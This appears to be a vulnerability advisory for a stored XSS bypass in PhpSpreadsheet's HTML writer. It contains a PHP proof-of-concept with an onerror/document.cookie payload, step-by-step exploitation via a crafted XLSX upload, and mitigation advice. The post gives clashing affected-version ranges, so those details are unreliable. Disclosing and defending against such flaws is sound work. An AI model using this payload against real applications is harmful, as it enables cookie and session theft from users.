PhpSpreadsheet, HTML Escaping Bypass, CVE-2026-40296 (Critical)

By /

Listen to this Post

The vulnerability resides in the HTML writer’s logic within `Writer/Html.php` at approximately line 1592. In this function, the code conditionally applies htmlspecialchars(), the standard PHP function for HTML entity encoding, only if the formatted cell data is strictly identical to the original data. This check, if ($cellData === $origData), is intended to avoid double-escaping, but it becomes the root of the bypass. When a cell is assigned a custom number format that includes the `@` placeholder—such as a format like '. @'—the system assesses the condition. Here, the formatter is designed to replace the `@` symbol with the cell’s value and prepend any literal characters, e.g., the period and space. This substitution operation results in the formatted output (". <img src=x onerror=alert(document.cookie)>") being different from the original raw string. Because they are not identical, the conditional block is skipped entirely, and no `htmlspecialchars()` escaping occurs for that cell. Consequently, the raw HTML/JavaScript payload is injected directly into the HTML output. The bypass is exceptionally sensitive; even a trailing space in the format code (e.g., "@ ") is sufficient to break the equality check. This was confirmed to be effective in versions up to 4.5.0, allowing stored Cross-Site Scripting (XSS) attacks when an application processes an uploaded file and displays the generated HTML to users.

dailycve form

Platform: PhpSpreadsheet
Version: <=5.6.0
Vulnerability : XSS Bypass
Severity: CRITICAL
date: 2026-04-28

Prediction: Patch 2026-05-05

Analytics under What Undercode Say:

Command to check your installed version of PhpSpreadsheet:
composer show phpoffice/phpspreadsheet
Find the vulnerable code line in Writer/Html.php:
grep -n "if (\$cellData === \$origData)" vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Writer/Html.php
Proof of Concept: PHP script to generate a vulnerable HTML file.
Save as poc.php and run with: php poc.php
cat > poc.php << 'EOF'
<?php
require 'vendor/autoload.php';
use PhpOffice\PhpSpreadsheet\Spreadsheet;
use PhpOffice\PhpSpreadsheet\Writer\Html;
use PhpOffice\PhpSpreadsheet\Cell\DataType;
$spreadsheet = new Spreadsheet();
$sheet = $spreadsheet->getActiveSheet();
// Set an XSS payload
$sheet->setCellValueExplicit('A1', '<img src=x onerror=alert(document.cookie)>', DataType::TYPE_STRING);
$sheet->getStyle('A1')->getNumberFormat()->setFormatCode('. @');
$writer = new Html($spreadsheet);
$writer->save('output.html');
echo "Vulnerable file 'output.html' created.\n";
?>
EOF
php poc.php

Exploit:

  1. Craft a Malicious XLSX: An attacker creates an XLSX file where a cell contains a JavaScript payload (e.g., <img src=x onerror=alert(document.cookie)>).
  2. Set a Custom Number Format: The attacker applies a custom number format to that cell. The format must include the text placeholder `@` followed by or preceded by any literal character (e.g., '. @', 'x@', or even a trailing space '@ ').
  3. Upload File: The attacker uploads this crafted XLSX file to a vulnerable application (e.g., a file converter or a data import tool).
  4. Trigger Execution: When the application uses the vulnerable version of PhpSpreadsheet to convert the XLSX file to HTML, the escaping mechanism is bypassed. The raw HTML/JavaScript is written directly to the output file.
  5. Stored XSS: Any victim who later views the generated HTML page will have the attacker’s script executed in their browser context, leading to potential session hijacking, data theft, or defacement.

Protection from this CVE

  • Update PhpSpreadsheet: Upgrade to a patched version immediately. According to the official advisory, fixed versions are 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0 or higher.
  • Patch the Logic: If an update is not possible, modify the conditional escaping logic in `Writer/Html.php` to always apply `htmlspecialchars()` regardless of whether the formatting changed the value.
  • Input Sanitization: Implement a strict Content Security Policy (CSP) to prevent inline script execution, which can act as a secondary layer of defense.
  • Review Dependencies: Integrate automated vulnerability scanning into your CI/CD pipeline (e.g., using composer audit) to detect known vulnerabilities in dependencies.

Impact

  • Stored Cross-Site Scripting (XSS): An attacker can inject persistent malicious scripts into the trusted web application.
  • Data Theft: Execution of JavaScript in a privileged context allows an attacker to steal cookies, session tokens, or other sensitive information from the victim’s browser.
  • Account Hijacking: Stolen session tokens for administrative areas or user accounts can lead to complete account takeover.
  • Application Disruption: Attackers could modify or delete content, or cause the application to malfunction for users.
  • Reputation Damage: A successful XSS attack can severely damage an organization’s trust and compliance standing.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top